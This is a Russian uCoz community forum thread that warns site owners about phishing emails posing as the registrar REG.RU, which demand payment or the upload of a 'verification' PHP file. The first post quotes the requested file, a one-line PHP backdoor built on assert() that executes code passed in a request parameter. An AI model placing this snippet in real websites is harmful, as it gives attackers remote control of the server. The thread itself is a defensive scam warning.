Страница 1 из 11
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Подтверждение прав администратора (письмо от REG.RU) (осторожно! мошенники)
Подтверждение прав администратора (письмо от REG.RU)
LikaSelena
Сообщений: 29
Репутация: 0

Сообщение # 1 | 18:51:41
Внимание! Если вам пришло письмо от имени регистратора домена с требованиями:

1) Установки PHP файла для верификации, активации домена или подтверждения прав владения доменом.
Пример содержимого файла, который требуют установить
Код
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

2) Срочной оплаты (дополнительных услуг или ново-введенных сборов). В письме присутствует кнопка оплаты
3) Продления домена. В письме присутствует кнопка оплаты


Пример письма с требованиями установить PHP файл
Цитата
Получено письмо от регистратора доменов REG.RU такого содержания

Уважаемый клиент!
В соответствии с поправками, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменным именем ***.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в
корневой директории сайта файл ******.php со следующим содержимым:
assert(stripslashes($_REQUEST[REG]));
?>

Файл должен быть создан в течение трех рабочих дней с
момента получения настоящего уведомления и находиться на сервере
до 8 августа 2017 года, 18:00 (UTC+03:00), в противном
случае процедура подтверждения будет считаться непройденной.
Уведомляем Вас о том, что если процедура подтверждения не будет пройдена,
обслуживание домена будет приостановлено.


Были зафиксированы случаи писем с требованием установки PHP файла от имени Роскомнадзора!



  • В первую очередь проверьте заголовки письма Проверка и Анализ заголовков e-mail Поле "от кого" не является достоверным, реальный адрес отправителя можно узнать только из служебных заголовков

  • Если вы видите кнопку оплаты, не нажимайте на неё! Оплата прямо из письма не производится!

  • Если при проверке служебных заголовков письма у вас возникли подозрения, не открывайте вложения в таких письмах и не переходите по ссылкам!

  • В случае любых подозрений, лучше написать в тех.поддержку регистратора домена и уточнить. Обратите внимание на то, что требования в таких письмах практически всегда имеют срочный характер. Игнорируйте "срочность" и все равно пишите в тех.поддержку регистратора.





Ознакомьтесь с предупреждениями и инструкциями регистраторов RU-CENTER, R01 и REG.RU

Прикрепления: 9711875.jpg(44Kb)
Сообщение отредактировал webanet - Понедельник, 18 Сен 2017, 21:57:16
zarim
Сообщений: 432
Репутация: 70
Уровень замечаний:

Сообщение # 2 | 19:17:24
LikaSelena, это вирус и явно не от регистратора, скажите спасибо, что юкоз не разрешает ставить пхп в корень ФМ smile
webanet
Личный менеджер
Сообщений: 23140
Репутация: 4873

Сообщение # 3 | 19:36:36
LikaSelena, это мошенники. прежде чем спешить устанавливать скрипты, всегда пишите в тех.поддержку и спрашивайте у них. в вашем случае надо было написать в тех.поддержку reg.ru можете и сейчас переслать им письмо, чтобы они были в курсе, что данный тип мошенничества до сих пор имеет место быть. раньше такое приходило якобы от ник ру. в любом случае на будущее. скрипты к себе на сайт никакие не устанавливаем не узнав у первоисточника что это такое и зачем/
вот предупреждение от nic.ru https://www.nic.ru/news/2017/alert_27.03.html

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
LikaSelena
Сообщений: 29
Репутация: 0

Сообщение # 4 | 20:25:55
zarim, webanet
Благодарю за предупреждение.
Я пыталась отправить письма на указанные там адреса, но они не проходили, а приходили сообщения, что письмо не может быть доставлено.
Меня смутило еще то, что домен у меня зарегистрирован в 2domains.ru, а письмо пришло, якобы, от reg.ru, хотя на сайте 2domains.ru и указано, что они официальный партнер.
Я также сразу написала и в суппорт 2domains.ru, но ответа пока не получила. Думаю, они поставят в известность своих партнеров по поводу мошенничества.

Еще раз спасибо за предупреждение
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Подтверждение прав администратора (письмо от REG.RU) (осторожно! мошенники)
Страница 1 из 11
Поиск: